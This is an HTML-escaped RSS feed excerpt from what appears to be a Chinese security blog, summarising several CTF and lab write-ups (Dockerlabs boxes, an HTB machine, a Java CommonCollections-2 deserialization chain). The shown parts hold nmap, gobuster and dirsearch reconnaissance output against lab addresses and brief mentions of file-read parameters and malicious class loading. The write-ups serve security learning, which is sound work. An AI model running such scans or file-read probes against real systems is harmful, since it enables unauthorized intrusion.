OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 14h59m36s
| smb2-time: 
|   date: 2025-03-02T03:03:53
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: 08:00:27:46:72:d1 (Oracle VirtualBox virtual NIC)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;把&lt;strong&gt;DC01&lt;/strong&gt;.&lt;strong&gt;SOUPEDECODE.LOCAL&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Inclusion</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-inclusion/</link>
      <pubDate>Fri, 28 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-inclusion/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Inclusion  
❯ nmap 172.17.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 20:33 CST
Nmap scan report for sitio.dl (172.17.0.2)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 03:cf:72:54:de:54:ae:cd:2a:16:58:6b:8a:f5:52:dc (ECDSA)
|_  256 13:bb:c2:12:f5:97:30:a1:49:c7:f9:d0:ba:d0:5e:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.08 ms sitio.dl (172.17.0.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Inclusion  
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/shop                 (Status: 301) [Size: 307] [--&amp;gt; http://172.17.0.2/shop/]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;再扫**/shop**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Sites</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-sites/</link>
      <pubDate>Fri, 28 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-sites/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/sites  
❯ nmap 172.17.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 20:05 CST
Nmap scan report for 172.17.0.2
Host is up (0.000077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 cb:8f:50:db:6d:d8:d4:ac:bf:54:b0:62:12:7c:f0:01 (ECDSA)
|_  256 ca:6b:c7:0c:2a:d6:0e:3e:ff:c4:6e:61:ac:35:db:01 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Configuraci\xC3\xB3n de Apache y Seguridad en Sitios Web
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.08 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.63 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/sites  
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php               ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/vulnerable.php       (Status: 200) [Size: 37]
/server-status        (Status: 403) [Size: 275]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;readanyfiles&#34;&gt;ReadAnyFiles&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/02/dockerlabs-sites/images/image-232.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/02/dockerlabs-sites/images/image-232.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Checker</title>
      <link>https://www.hyhforever.top/posts/2025/02/htb-checker/</link>
      <pubDate>Thu, 27 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/htb-checker/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Checker  
❯ nmap checker.htb -sV   

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd
8080/tcp open  http    Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;在&lt;strong&gt;checker.htb:8080&lt;/strong&gt;页面上发现了一个子域名：&lt;strong&gt;vault&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>CommonCollections-2</title>
      <link>https://www.hyhforever.top/posts/2025/02/commoncollections-2/</link>
      <pubDate>Wed, 26 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/commoncollections-2/</guid>
      <description>&lt;h2 id=&#34;environment&#34;&gt;Environment&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Pom.xml&lt;/strong&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;org.apache.commons&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;commons-collections4&amp;lt;/artifactId&amp;gt;
            &amp;lt;version&amp;gt;4.0&amp;lt;/version&amp;gt;
        &amp;lt;/dependency&amp;gt;
        &amp;lt;dependency&amp;gt;
            &amp;lt;groupId&amp;gt;org.javassist&amp;lt;/groupId&amp;gt;
            &amp;lt;artifactId&amp;gt;javassist&amp;lt;/artifactId&amp;gt;
            &amp;lt;version&amp;gt;3.22.0-GA&amp;lt;/version&amp;gt;
        &amp;lt;/dependency&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;templatesimpi&#34;&gt;TemplatesImpI&lt;/h2&gt;
&lt;p&gt;这个类用于加载恶意类，当声明一个实例的时候会触发&lt;strong&gt;getTransletInstance&lt;/strong&gt;方法&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/02/commoncollections-2/images/image-198.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/02/commoncollections-2/images/image-198.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;查看&lt;strong&gt;getTransletInstance&lt;/strong&gt;中**_name**变量为空则直接返回&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Swiss</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-swiss/</link>
      <pubDate>Wed, 26 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-swiss/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/swiss  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 19:53 CST
Nmap scan report for realgob.dl (172.17.0.2)
Host is up (0.00026s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 f1:2d:b0:54:e3:57:94:c8:3a:1a:7a:ba:d8:2d:7e:f9 (ECDSA)
80/tcp open  tcpwrapped
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: \xF0\x9F\x91\x8B Mario \xC3\x81lvarez Fer\xC5\x84andez
MAC Address: 02:42:AC:11:00:02 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/25%OT=22%CT=1%CU=40368%PV=Y%DS=1%DC=D%G=Y%M=0242A
OS:C%TM=67BDAF4F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=Z%I
OS:I=I%TS=A)SEQ(SP=107%GCD=2%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7
OS:%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST1
OS:1)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%
OS:W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=
OS:Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=O%A=Z%F=R%
OS:O=%RD=0%Q=)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms realgob.dl (172.17.0.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.18 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;ffuf&#34;&gt;ffuf&lt;/h2&gt;
&lt;p&gt;扫描得到一个&lt;strong&gt;file&lt;/strong&gt;参数可以进行读取文件&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Apolos</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-apolos/</link>
      <pubDate>Tue, 25 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-apolos/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 16:15 CST
Nmap scan report for 172.17.0.2
Host is up (0.000089s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apple Store
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.98 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ dirsearch -u 172.17.0.2 -t 50 -i 200 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                     
                                                                                                                            
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460

Output File: /home/kali/reports/_172.17.0.2/_25-02-25_16-19-18.txt

Target: http://172.17.0.2/

[16:19:18] Starting:                                                                                                        
[16:19:35] 200 - 631B  - /login.php                                        
[16:19:41] 200 - 626B  - /register.php                                     
[16:19:47] 200 - 405B  - /uploads/                                         
[16:19:48] 200 - 0B  - /vendor/composer/autoload_static.php              
[16:19:48] 200 - 1KB - /vendor/composer/LICENSE                          
[16:19:48] 200 - 520B  - /vendor/                                          
[16:19:48] 200 - 0B  - /vendor/autoload.php                              
[16:19:48] 200 - 0B  - /vendor/composer/autoload_classmap.php
[16:19:48] 200 - 0B  - /vendor/composer/autoload_psr4.php                
[16:19:48] 200 - 0B  - /vendor/composer/ClassLoader.php
[16:19:48] 200 - 3KB - /vendor/composer/installed.json                   
[16:19:48] 200 - 0B  - /vendor/composer/autoload_namespaces.php          
[16:19:48] 200 - 0B  - /vendor/composer/autoload_real.php                
                                                                             
Task Completed       
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;可以看到存在&lt;strong&gt;uploads&lt;/strong&gt;目录&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Chatme</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-chatme/</link>
      <pubDate>Tue, 25 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-chatme/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/chatme  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 19:54 CST
Nmap scan report for 172.17.0.2
Host is up (0.000088s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: ChatMe - The Best Online Chat Solution
|_http-server-header: nginx/1.24.0 (Ubuntu)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.17.0.2
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;网页中存在&lt;strong&gt;chat.chatme.dl&lt;/strong&gt;，将其添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Report</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-report/</link>
      <pubDate>Tue, 25 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-report/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Report  
❯ nmap 172.17.0.2 -sV  -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-25 18:34 CST
Nmap scan report for 172.17.0.2
Host is up (0.000076s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 58:46:38:70:8c:d8:4a:89:93:07:b3:43:17:81:59:f1 (ECDSA)
|_  256 25:99:39:02:52:4b:80:3f:aa:a8:9a:d4:8e:9a:eb:10 (ED25519)
80/tcp   open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Did not follow redirect to http://realgob.dl/
3306/tcp open  mysql   MySQL 5.5.5-10.11.8-MariaDB-0ubuntu0.24.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.11.8-MariaDB-0ubuntu0.24.04.1
|   Thread ID: 8
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Support41Auth, IgnoreSigpipes, ConnectWithDatabase, SupportsTransactions, InteractiveClient, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: SMf;1&amp;amp;jb.[aWoKfBUf~i
|_  Auth Plugin Name: mysql_native_password
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.08 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;将&lt;strong&gt;realgob.dl&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Grandma</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-grandma/</link>
      <pubDate>Mon, 24 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-grandma/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap-1010102&#34;&gt;Nmap 10.10.10.2&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/grandma  
❯ nmap 10.10.10.2 -sV  -A                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 14:29 CST
Nmap scan report for 10.10.10.2
Host is up (0.000093s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f0:d4:14:46:ad:c7:15:dd:09:8d:5a:c9:4c:a0:41:86 (ECDSA)
|_  256 88:8f:11:21:2a:29:72:fb:60:cb:39:c7:97:05:aa:9d (ED25519)
80/tcp   open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Did not follow redirect to http://grandma.dl/
5000/tcp open  http    aiohttp 3.9.1 (Python 3.12)
| http-title: Hospital - Calendar
|_Requested resource was /static/index.html
|_http-server-header: Python/3.12 aiohttp/3.9.1
MAC Address: 02:42:0A:0A:0A:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 172.17.0.2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 10.10.10.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;将&lt;strong&gt;grandma.dl&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Norc</title>
      <link>https://www.hyhforever.top/posts/2025/02/dockerlabs-norc/</link>
      <pubDate>Mon, 24 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/02/dockerlabs-norc/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 172.17.0.2 -sV  -A                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 21:13 CST
Nmap scan report for 172.17.0.2
Host is up (0.00011s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 8c:5c:7b:fe:79:92:7a:f9:85:ec:a5:b9:27:25:db:85 (ECDSA)
|_  256 ba:69:95:e3:df:7e:42:ec:69:ed:74:9e:6b:f6:9a:06 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Did not follow redirect to http://norc.labs/?password-protected=login&amp;amp;redirect_to=http%3A%2F%2F172.17.0.2%2F
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.11 ms 172.17.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
